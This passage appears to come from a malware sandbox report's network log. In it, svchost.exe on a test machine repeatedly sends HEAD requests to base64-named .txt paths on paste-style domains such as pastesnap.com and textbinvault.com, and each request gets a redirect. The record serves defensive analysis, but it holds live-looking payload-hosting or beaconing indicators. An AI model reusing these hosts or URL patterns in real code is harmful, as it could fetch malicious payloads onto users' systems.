                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GO0%2BzMFJLoFcHXWXsC8ZJSGSV41AKfcPoHjaxeS7HzxVIPUyrs4V2jwtLwffAer1kwwMUtm4cg967%2BqYvxmWNZf1CiIE0jVMZB2DwGZme94pa7oJsTtqpBft%2FQEmsfo8vkPC"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4326a67f5f7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=756&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              107192.168.2.750296188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:16.319017887 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:16.775712013 CET882INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:16 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWVLna%2FjuBnyKB%2BOMx1dpjCuDWP8iKsAjDymHVTwq%2Fkj70mWn%2FEaoUNPlIpg%2Fri4sFysgQs8y54uPLShuVLfydWb%2FulPOi%2B4yYZsL%2B67o8JYqLUUR3lVafPiKgi0SZL8GW8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4357ee9c425-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1479&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              108192.168.2.750297104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:16.597207069 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.058357954 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyUQkzTY%2BXTo7FUQjUZBL7o2GYG5tnl4zzDxjYTfrRxryPcgP0KfY%2BZY98I1q9NjfRUmTQE5KBneBHTe35Lh59i%2Btj1tmfTtzzIo0JBDXBZQpipv2giOjuP3PumiXMGg9fKb"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4374b4d7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1948&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              109192.168.2.750299172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:16.782347918 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.255031109 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2F%2Bq9MEoIqAr0Kpc8sa8z01DuRWKk3L38gxhi%2FBUEl5BK%2F8KTToK1XQlY7dNKDIkjIefYjbYdBzobdZTSEURiRW6tTOt3pQQS5lmslR8Hp8GDGROL6bgXzJyeUgBCpAy"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4387e340fab-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1464&rtt_var=732&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              110192.168.2.750304172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:17.261694908 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.738234997 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxZwNZSrFcsy4tWcZiAyzd4h%2BkxMlI6Ayx%2BpZS4C4KMcfO2B%2FbKVf0WI%2BWujaUXw8QkGg1PsEYQHuFb1QMzQVnq8kJSgKYsc%2FHJDf7lTBEvSpdW20frLKC8eTZpUyepGiuwn"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc43b7f60440e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              111192.168.2.750306188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:17.540326118 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:17.993443012 CET876INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:17 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1L3%2BoaypDoxPyZt93e%2FJ2nnvD6WuMEr09OPk0gUWwAO1n4vnAuNSetgLaBWBlpo%2Fm4PaY5cFNJOAAIT%2BuBn5n48lkEglYBwyxn%2FdD80PLmPBQvqchgR5wmxXneHRGl0asc%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc43d28bb4378-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              112192.168.2.750308104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:17.744788885 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:18.194657087 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:18 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4B8ZEGqaBgrehNGukFjIJjpmCUkl0f4p9t778OhzU%2BuoR4fgt%2BQM70VUTpwzIQtasLh7pJ20LOdQRf%2FQPdPNsWTrbS%2BXFcA0EnjRrH7gbRD8bX3EfOWAfTWnPPOuAJfQAJjY"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc43e6f997c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1970&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              113192.168.2.750310172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:18.001146078 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:18.455535889 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:18 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzPJBIc3NaV9PE%2FSoNb8Qxzps%2BHp6CMEzNhaEHnhQK9iXIvxva5xBZg0NzVqRHS%2BpKjoQCOXnSregNEaa1DESwbYZV7lBxqeNYB%2F1snpMDgm5eopLbJegd6JkxdbRYFa"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4400aba43ef-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1753&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              114192.168.2.750315172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:18.465682030 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:18.937992096 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:18 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=maVPfynt%2BXM9ZcgdaazgKK1XdRoqtM9JaCCPoczc%2FzVMZ7FeWw3XNG1JoMkqeZqzkK70yHzqO5vgF10PhtMo4orgBWSQxrW9K659Bsxkl50wOi9o3gwK4F8fPpw%2BYYj51Z5t"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4430b38420d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              115192.168.2.750317188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:18.682122946 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:19.165075064 CET876INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:19 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6E3Fv8t5Svf1rdlDH1y6JRyu18nKo1fUAHRw%2FRZytCBG%2F2QsWTdbulsSqr%2B%2BAJP%2FkCCgc0wO9W3as5VuH8bFIkLymwVYfsPAySfZqRuDTxj1s4GcBtp5n7Ee95aZuWL1LPo%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4446961726e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1918&rtt_var=959&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              116192.168.2.750319104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:18.967952967 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:19.425389051 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:19 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mQ3Ig%2BZdGikewLoszBBYnqXJr5a3nuXUQvkJhwcnuoeLDgYT2HmQEN85qEDiTiSpMl0Mvi4Eh8R%2Fi3Y0YYdGFCaWwidvrHIXJ9mbAFaL4C2VpvnW3%2Bkhgc1UENTWkj%2Fr6qN"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4461f6b42e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              117192.168.2.750321172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:19.192089081 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:19.642623901 CET858INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:19 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rVtmVLtd9RA9C6LgHZLnqfHslrKOZoC14Eu3eNNfPngRcVjrf72mDT2EMDdtJYqqih0NGyKh%2Fozpxio81dlccAGkKMgsvSRcLLV2UmSNgJ1idRdU%2BXM1LEXrlyXIted9"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc447791befa1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1977&rtt_var=988&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              118192.168.2.750326172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:19.683811903 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:20.144347906 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:20 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:20 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1Nl5K4y%2BapY0Zc5Vut0K1EgtxI60pCQNJwy37crQXjJSBLN%2BCw4DFh%2Bokpw3vm3ZQ9EsstdcYySKDArXjnLpm9uHqSfkDdreHAPE85WuvMQcMUEuyGUcY%2BrFUb7u6%2FffC4J"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc44a8b21436f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1518&rtt_var=759&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              119192.168.2.750329188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:20.251477957 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:20.726183891 CET876INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:20 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:20 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UdvBzDEDCfUQApKtNTyypUXiHku5Kb7zjH3iCkhwHkqA9kxc%2BQ1%2F8u6txJ%2BJx%2BdjiRCRTev5yHf4NKDekGLpnvnWSuqfS240a78ukBRvVrxGHsveI%2B9svgRMViLUarZIss%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc44e2d074369-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              120192.168.2.750330104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:20.323273897 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:20.787805080 CET887INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:20 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:20 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRnTzLzEypN8QIS008d5i%2BaF%2BoieYszt03QlZUBF%2F0cLLaUC3Cp0BVU3DucC7OG1g3ZzavENiFLEVrgp4I6ib4hwN%2FPn7%2FqN4jZyfNZrEd%2Fc%2BIR15D0T9Q%2FihnFbUARcuVd8"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc44e9f9b4414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              121192.168.2.750332172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:20.732248068 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:21.186387062 CET860INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:21 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTKyaxIfwyek0ypUV0JaV0bq62umQzdbT3k%2BL0ZxtOKKaUkBjUPCo6AodT5QIA0hDcsV405MadpNicAFmi3tjtR0ROkgE%2Fv%2BMqpHIT70C8UgMcdw9xpea3QXlPMSuRvI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4511c085e60-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              122192.168.2.750337172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:21.192483902 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:21.664077044 CET869INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:21 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTADVErcSL2L6KucFFQ8OWYBdVVu2KBgDNzBQ8wbZQSY%2F9KRPascfb0mcEwIiJakpagC1O%2BTGR8quMjCmAkmR12x9C9epXwyifMNumoWwCzt9oGJ55lbPuaKyoZl5JziTvaM"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4540c7142cc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              123192.168.2.750339188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:21.282342911 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:21.729758024 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:21 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBlpsishq66XXZteDCgCGaQkaKnxOClFed5C93skkpv5x%2Ffei3BYEmR33qG4qbEIPyREej4v5iV76Tmh1CNsHnj7j2cDFxsFnQt6i7vvtpOS92zh6ah80NjKj3QJ5PNNmR8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4548888efa9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              124192.168.2.750341104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:21.670886040 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:22.121372938 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:22 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
